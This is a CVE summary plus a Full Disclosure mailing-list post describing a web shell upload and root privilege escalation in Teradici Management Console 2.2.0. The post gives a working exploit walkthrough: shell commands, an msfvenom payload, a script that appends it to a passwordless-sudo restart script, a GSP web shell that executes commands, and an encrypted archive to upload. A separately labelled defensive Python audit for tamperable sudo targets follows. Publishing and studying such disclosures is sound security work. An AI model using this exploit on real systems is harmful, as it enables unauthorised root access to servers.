CVE-2017-20121: Full Disclosure: Teradici Management Console 2.2.0

A vulnerability was found in Teradici Management Console 2.2.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Database Management. The manipulation leads to improper privilege management. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used.


Full Disclosure mailing list archives

Teradici Management Console 2.2.0 - Privilege Escalation

From: Harrison Neal <hneal () whatdidibreak com>
Date: Wed, 22 Feb 2017 08:26:18 +0000

# Exploit Title: Teradici Management Console 2.2.0 - Web Shell Upload and Privilege Escalation

Date: February 22nd, 2017

Exploit Author: hantwister

Vendor Homepage: http://www.teradici.com/products-and-solutions/pcoip-products/management-console

Software Link: https://techsupport.teradici.com/ics/support/DLRedirect.asp?fileID=63583 (login required)

Version: 2.2.0

Users that can access the Settings > Database Management page can achieve code execution as root on older versions of PCoIP MC 2.x. (Based on CentOS 7 x64)

Web Shell Upload Vulnerability Overview

Database archives are extracted under /opt/jetty/tmpdeploy. By creating a malicious archive with a malicious web script that extracts to the known directory /opt/jetty/tmpdeploy/jetty-0.0.0.0-8080-console.war-_console-any- it is possible to add or modify class files and XML files pertaining to the application.

Privilege Escalation Vulnerability Overview

The jetty user owns the file /opt/jetty/jetty_self_restart.sh, and the same user has sudo rights to run that file without a password. By manipulating this file, arbitrary code can be run as root.

Exploiting The Vulnerabilities

alice:~$ mkdir -p runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
alice:~$ cd runasroot
alice:~/runasroot$ msfvenom (snip) > evil
alice:~/runasroot$ chmod a+x evil
alice:~/runasroot$ nano modify_self_restart.sh

#!/bin/bash
echo /tmp/evil >> /opt/jetty/jetty_self_restart.sh

alice:~/runasroot$ chmod a+x modify_self_restart.sh
alice:~/runasroot$ cd jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ nano runasroot.gsp

<html>
<head>
<title>runasroot</title>
</head>
<body>
<pre>
<% out << "cp /opt/jetty/tmpdeploy/evil /tmp/".execute().text %>
<% out << "/opt/jetty/tmpdeploy/modify_self_restart.sh".execute().text %>
<% out << "sudo /opt/jetty/jetty_self_restart.sh".execute().text %>
</pre>
</body>
</html>

alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ cd ../../..
alice:~/runasroot$ tar -zcf runasroot.tar.gz evil modify_self_restart.sh jetty-0.0.0.0-8080-console.war-_console-any-
alice:~/runasroot$ openssl enc -e -aes-256-cbc -salt -in runasroot.tar.gz -out runasroot.archive -pass pass:4400Dominion -p

Now, choose to upload runasroot.archive through the Database Management page. An error will be displayed that it wasn’t a valid archive. Now, navigate to https://IP/console/images/runasroot.gsp

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
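
Added example, not part of the original post or of the vendor's code: an audit for the condition described under "Privilege Escalation Vulnerability Overview", a passwordless sudo target that a non-root account owns or can write to. The sudoers line is a constructed sample modelled on that description, and the function names and the trusted_uid parameter are assumptions of this example.

```python
import os
import re
import stat

# Matches "user host = (runas) NOPASSWD: cmd[, cmd...]" sudoers rules.
RULE = re.compile(r"^\s*([^#\s]+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?NOPASSWD:\s*(.+)$")

def nopasswd_commands(sudoers_text):
    """Return [(user, command_path)] for every NOPASSWD rule in the text."""
    found = []
    for line in sudoers_text.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        for cmd in m.group(2).split(","):
            words = cmd.split()
            if words and words[0].startswith("/"):  # skips aliases such as ALL
                found.append((m.group(1), words[0]))
    return found

def tamper_risks(path, trusted_uid=0):
    """List reasons an account other than trusted_uid could change what path runs."""
    risks = []
    real = os.path.realpath(path)
    for p in (real, os.path.dirname(real)):  # the file, then its directory
        st = os.stat(p)
        if st.st_uid != trusted_uid:
            risks.append(f"{p}: owned by uid {st.st_uid}, not {trusted_uid}")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            risks.append(f"{p}: group/other writable ({stat.S_IMODE(st.st_mode):o})")
    return risks

def audit(sudoers_text, trusted_uid=0):
    """Map each passwordless sudo target to its risks (empty list = clean)."""
    report = {}
    for user, cmd in nopasswd_commands(sudoers_text):
        try:
            report[(user, cmd)] = tamper_risks(cmd, trusted_uid)
        except FileNotFoundError:
            report[(user, cmd)] = [f"{cmd}: missing, check who can create it"]
    return report

# Constructed sample rule modelled on the advisory's description.
SAMPLE = "jetty ALL=(root) NOPASSWD: /opt/jetty/jetty_self_restart.sh\n"

if __name__ == "__main__":
    for (user, cmd), risks in audit(SAMPLE).items():
        print(user, cmd, risks or "ok")
```

On a real host, pass the combined contents of /etc/sudoers and /etc/sudoers.d/ as sudoers_text; any non-empty risk list means the sudo rule effectively grants root to whoever can edit that file.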
